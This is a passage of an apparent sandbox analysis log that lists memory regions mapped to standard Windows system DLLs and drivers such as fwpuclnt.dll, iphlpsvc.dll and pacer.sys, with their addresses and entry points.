"\\Windows\\System32\\drivers\\pacer.sys" (normalized: "c:\\windows\\system32\\drivers\\pacer.sys") Region: id = 3562 start_va = 0xb60000 end_va = 0xb63fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pacer.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\pacer.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\pacer.sys.mui") Region: id = 3563 start_va = 0xb30000 end_va = 0xb50fff monitored = 0 entry_point = 0xb4a06c region_type = mapped_file name = "pacer.sys" filename = "\\Windows\\System32\\drivers\\pacer.sys" (normalized: "c:\\windows\\system32\\drivers\\pacer.sys") Region: id = 3564 start_va = 0xb60000 end_va = 0xb63fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pacer.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\pacer.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\pacer.sys.mui") Region: id = 3565 start_va = 0xb30000 end_va = 0xb50fff monitored = 0 entry_point = 0xb4a06c region_type = mapped_file name = "pacer.sys" filename = "\\Windows\\System32\\drivers\\pacer.sys" (normalized: "c:\\windows\\system32\\drivers\\pacer.sys") Region: id = 3566 start_va = 0xb60000 end_va = 0xb63fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pacer.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\pacer.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\pacer.sys.mui") Region: id = 3567 start_va = 0xb30000 end_va = 0xb7ffff monitored = 0 entry_point = 0xb32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3569 start_va = 0xb80000 end_va = 0xb92fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3570 start_va = 0xb30000 end_va = 0xb7ffff monitored = 0 entry_point = 0xb32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3571 start_va = 0xb80000 end_va = 0xb92fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3572 start_va = 0xb30000 end_va = 0xb7ffff monitored = 0 entry_point = 0xb32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3573 start_va = 0xb80000 end_va = 0xb92fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3575 start_va = 0xb30000 end_va = 0xb7ffff monitored = 0 entry_point = 0xb32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3576 start_va = 0xb80000 end_va = 0xb92fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3577 start_va = 0xb30000 end_va = 0xb7ffff monitored = 0 entry_point = 0xb32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3578 start_va = 0xb80000 end_va = 0xb92fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3579 start_va = 0xb30000 end_va = 0xb7ffff monitored = 0 entry_point = 0xb32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3580 start_va = 0xb80000 end_va = 0xb92fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3581 start_va = 0xb30000 end_va = 0xb7ffff monitored = 0 entry_point = 0xb32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3582 start_va = 0xb80000 end_va = 0xb92fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3583 start_va = 0xb30000 end_va = 0xb7ffff monitored = 0 entry_point = 0xb32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3584 start_va = 0xb80000 end_va = 0xb92fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3585 start_va = 0xb30000 end_va = 0xb7ffff monitored = 0 entry_point = 0xb768c8 region_type = mapped_file name = "pnrpsvc.dll" filename = "\\Windows\\System32\\pnrpsvc.dll" (normalized: "c:\\windows\\system32\\pnrpsvc.dll") Region: id = 3587 start_va = 0xb80000 end_va = 0xb82fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pnrpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\pnrpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\pnrpsvc.dll.mui") Region: id = 3589 start_va = 0xb30000 end_va = 0xb7ffff monitored = 0 entry_point = 0xb768c8 region_type = mapped_file name = "pnrpsvc.dll" filename = "\\Windows\\System32\\pnrpsvc.dll" (normalized: "c:\\windows\\system32\\pnrpsvc.dll") Region: id = 3590 start_va = 0xb80000 end_va = 0xb82fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pnrpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\pnrpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\pnrpsvc.dll.mui") Region: id = 3591 start_va = 0xde0000 end_va = 0xebbfff monitored = 0 entry_point = 0xe55ec8 region_type = mapped_file name = "azroles.dll" filename = "\\Windows\\System32\\azroles.dll" (normalized: "c:\\windows\\system32\\azroles.dll") Region: id = 3594 start_va = 0xb30000 end_va = 0xb30fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "azroles.dll.mui" filename = "\\Windows\\System32\\en-US\\azroles.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\azroles.dll.mui") Region: id = 3595 start_va = 0xde0000 end_va = 0xebbfff monitored = 0 entry_point = 0xe55ec8 region_type = mapped_file name = "azroles.dll" filename = "\\Windows\\System32\\azroles.dll" (normalized: "c:\\windows\\system32\\azroles.dll") Region: id = 3596 start_va = 0xb30000 end_va = 0xb30fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "azroles.dll.mui" filename = "\\Windows\\System32\\en-US\\azroles.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\azroles.dll.mui") Region: id = 3597 start_va = 0xde0000 end_va = 0xec1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fxsresm.dll" filename = "\\Windows\\System32\\FXSRESM.dll" (normalized: "c:\\windows\\system32\\fxsresm.dll") Region: id = 3599 start_va = 0xb30000 end_va = 0xb58fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fxsresm.dll.mui" filename = "\\Windows\\System32\\en-US\\FXSRESM.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fxsresm.dll.mui") Region: id = 3600 start_va = 0xde0000 end_va = 0xec1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fxsresm.dll" filename = "\\Windows\\System32\\FXSRESM.dll" (normalized: "c:\\windows\\system32\\fxsresm.dll") Region: id = 3601 start_va = 0xb30000 end_va = 0xb58fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fxsresm.dll.mui" filename = "\\Windows\\System32\\en-US\\FXSRESM.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fxsresm.dll.mui") Region: id = 3603 start_va = 0xb30000 end_va = 0xbd8fff monitored = 0 entry_point = 0xb418d0 region_type = mapped_file name = "cscsvc.dll" filename = "\\Windows\\System32\\cscsvc.dll" (normalized: "c:\\windows\\system32\\cscsvc.dll") Region: id = 3605 start_va = 0xc60000 end_va = 0xc64fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cscsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\cscsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\cscsvc.dll.mui") Region: id = 3606 start_va = 0xb30000 end_va = 0xbd8fff monitored = 0 entry_point = 0xb418d0 region_type = mapped_file name = "cscsvc.dll" filename = "\\Windows\\System32\\cscsvc.dll" (normalized: "c:\\windows\\system32\\cscsvc.dll") Region: id = 3607 start_va = 0xc60000 end_va = 0xc64fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cscsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\cscsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\cscsvc.dll.mui") Region: id = 3608 start_va = 0xb30000 end_va = 0xbd8fff monitored = 0 entry_point = 0xb418d0 region_type = mapped_file name = "cscsvc.dll" filename = "\\Windows\\System32\\cscsvc.dll" (normalized: "c:\\windows\\system32\\cscsvc.dll") Region: id = 3609 start_va = 0xc60000 end_va = 0xc64fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cscsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\cscsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\cscsvc.dll.mui") Region: id = 3610 start_va = 0xb30000 end_va = 0xbd8fff monitored = 0 entry_point = 0xb418d0 region_type = mapped_file name = "cscsvc.dll" filename = "\\Windows\\System32\\cscsvc.dll" (normalized: "c:\\windows\\system32\\cscsvc.dll") Region: id = 3612 start_va = 0xc60000 end_va = 0xc64fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cscsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\cscsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\cscsvc.dll.mui") Region: id = 3613 start_va = 0xb30000 end_va = 0xb7ffff monitored = 0 entry_point = 0xb32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3614 start_va = 0xb80000 end_va = 0xb92fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3615 start_va = 0xb30000 end_va = 0xb7ffff monitored = 0 entry_point = 0xb32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3616 start_va = 0xb80000 end_va = 0xb92fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3617 start_va = 0xb30000 end_va = 0xb7ffff monitored = 0 entry_point = 0xb32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3618 start_va = 0xb80000 end_va = 0xb92fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3619 start_va = 0xb30000 end_va = 0xb7ffff monitored = 0 entry_point = 0xb32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3620 start_va = 0xb80000 end_va = 0xb92fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3621 start_va = 0xb30000 end_va = 0xb7ffff monitored = 0 entry_point = 0xb32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3623 start_va = 0xb80000 end_va = 0xb92fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3624 start_va = 0xb30000 end_va = 0xb7ffff monitored = 0 entry_point = 0xb32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3625 start_va = 0xb80000 end_va = 0xb92fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3626 start_va = 0xb30000 end_va = 0xb7ffff monitored = 0 entry_point = 0xb32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3627 start_va = 0xb80000 end_va = 0xb92fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3628 start_va = 0xb30000 end_va = 0xb7ffff monitored = 0 entry_point = 0xb32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3629 start_va = 0xb80000 end_va = 0xb92fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3630 start_va = 0xb30000 end_va = 0xb7ffff monitored = 0 entry_point = 0xb32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3631 start_va = 0xb80000 end_va = 0xb92fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3633 start_va = 0xb30000 end_va = 0xb7ffff monitored = 0 entry_point = 0xb32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3634 start_va = 0xb80000 end_va = 0xb92fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3635 start_va = 0xb30000 end_va = 0xb7ffff monitored = 0 entry_point = 0xb32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3636 start_va = 0xb80000 end_va = 0xb92fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3637 start_va = 0xb30000 end_va = 0xb7ffff monitored = 0 entry_point = 0xb32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3638 start_va = 0xb80000 end_va = 0xb92fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3639 start_va = 0xb30000 end_va = 0xb7ffff monitored = 0 entry_point = 0xb32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3640 start_va = 0xb80000 end_va = 0xb92fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3641 start_va = 0xb30000 end_va = 0xb7ffff monitored = 0 entry_point = 0xb32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3642 start_va = 0xb80000 end_va = 0xb92fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3643 start_va = 0xb30000 end_va = 0xbbafff monitored = 0 entry_point = 0xba51ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 3646 start_va = 0xbc0000 end_va = 0xbc9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 3647 start_va = 0xb30000 end_va = 0xbbafff monitored = 0 entry_point = 0xba51ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 3648 start_va = 0xbc0000 end_va = 0xbc9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 3649 start_va = 0xb30000 end_va = 0xbbafff monitored = 0 entry_point = 0xba51ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 3650 start_va = 0xbc0000 end_va = 0xbc9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 3651 start_va = 0xb30000 end_va = 0xbbafff monitored = 0 entry_point = 0xba51ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 3653 start_va = 0xbc0000 end_va = 0xbc9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 3654 start_va = 0xb30000 end_va = 0xbbafff monitored = 0 entry_point = 0xba51ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 3655 start_va = 0xbc0000 end_va = 0xbc9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 3656 start_va = 0xb30000 end_va = 0xbbafff monitored = 0 entry_point = 0xba51ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 3657 start_va = 0xbc0000 end_va = 0xbc9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 3658 start_va = 0xb30000 end_va = 0xbbafff monitored = 0 entry_point = 0xba51ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 3659 start_va = 0xbc0000 end_va = 0xbc9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 3660 start_va = 0xb30000 end_va = 0xbbafff monitored = 0 entry_point = 0xba51ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 3661 start_va = 0xbc0000 end_va = 0xbc9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 3662 start_va = 0xb30000 end_va = 0xbbafff monitored = 0 entry_point = 0xba51ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 3663 start_va = 0xbc0000 end_va = 0xbc9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 3664 start_va = 0xb30000 end_va = 0xbbafff monitored = 0 entry_point = 0xba51ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 3665 start_va = 0xbc0000 end_va = 0xbc9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 3666 start_va = 0xb30000 end_va = 0xb49fff monitored = 1 entry_point = 0xb31380 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 3669 start_va = 0xb50000 end_va = 0xb5bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 3670 start_va = 0xb30000 end_va = 0xb49fff monitored = 1 entry_point = 0xb31380 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 3671 start_va = 0xb50000 end_va = 0xb5bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 3672 start_va = 0xb30000 end_va = 0xb49fff monitored = 1 entry_point = 0xb31380 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 3673 start_va = 0xb50000 end_va = 0xb5bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 3674 start_va = 0xb30000 end_va = 0xb49fff monitored = 1 entry_point = 0xb31380 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 3676 start_va = 0xb50000 end_va = 0xb5bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 3677 start_va = 0xb30000 end_va = 0xb49fff monitored = 1 entry_point = 0xb31380 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 3678 start_va = 0xb50000 end_va = 0xb5bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 3679 start_va = 0xb30000 end_va = 0xb49fff monitored = 1 entry_point = 0xb31380 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 3680 start_va = 0xb50000 end_va = 0xb5bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 3681 start_va = 0xb30000 end_va = 0xb57fff monitored = 0 entry_point = 0xb31860 region_type = mapped_file name = "umpo.dll" filename = "\\Windows\\System32\\umpo.dll" (normalized: "c:\\windows\\system32\\umpo.dll") Region: id = 3684 start_va = 0xb60000 end_va = 0xb60fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "umpo.dll.mui" filename = "\\Windows\\System32\\en-US\\umpo.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\umpo.dll.mui") Region: id = 3686 start_va = 0xb30000 end_va = 0xb57fff monitored = 0 entry_point = 0xb31860 region_type = mapped_file name = "umpo.dll" filename = "\\Windows\\System32\\umpo.dll" (normalized: "c:\\windows\\system32\\umpo.dll") Region: id = 3687 start_va = 0xb60000 end_va = 0xb60fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "umpo.dll.mui" filename = "\\Windows\\System32\\en-US\\umpo.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\umpo.dll.mui") 